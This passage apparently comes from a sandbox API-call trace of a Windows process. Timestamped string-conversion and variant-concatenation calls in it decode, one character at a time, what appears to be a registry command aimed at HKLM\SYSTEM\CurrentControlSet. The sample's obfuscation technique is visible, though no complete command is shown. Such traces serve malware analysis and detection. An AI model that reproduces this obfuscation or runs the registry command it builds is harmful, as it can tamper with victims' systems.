CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.042] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.042] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.042] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0167.043] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.043] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.043] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.044] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0167.044] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="U", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="U\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.052] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="H", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="H") returned 1 [0167.053] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="X", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.053] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="K", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="K") returned 1 [0167.053] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.054] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="L", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="L") returned 1 [0167.054] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.055] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0167.055] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.055] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.056] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.056] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.056] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.056] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.057] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.057] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Y", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="Y") returned 1 [0167.057] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.058] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.058] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.058] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0167.058] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.059] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.059] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.060] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0167.060] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.147] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.147] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.148] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.148] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.149] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0167.149] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.150] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.150] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.150] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.151] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.151] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.151] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.152] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.152] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.153] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.153] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.154] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.159] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.159] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.160] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.160] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.160] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.161] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.161] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.162] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.162] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.163] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.163] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.163] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.164] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.164] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0167.164] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.165] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.165] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.166] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.166] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.166] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.167] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.167] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167da4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.167] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.168] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167d8c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.168] VarCat (in: pvarLeft=0x28f8a0, pvarRight=0x28f890, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.168] VarSub (in: pvarLeft=0x28fa60, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.169] MultiByteToWideChar (in: CodePage=0x0, 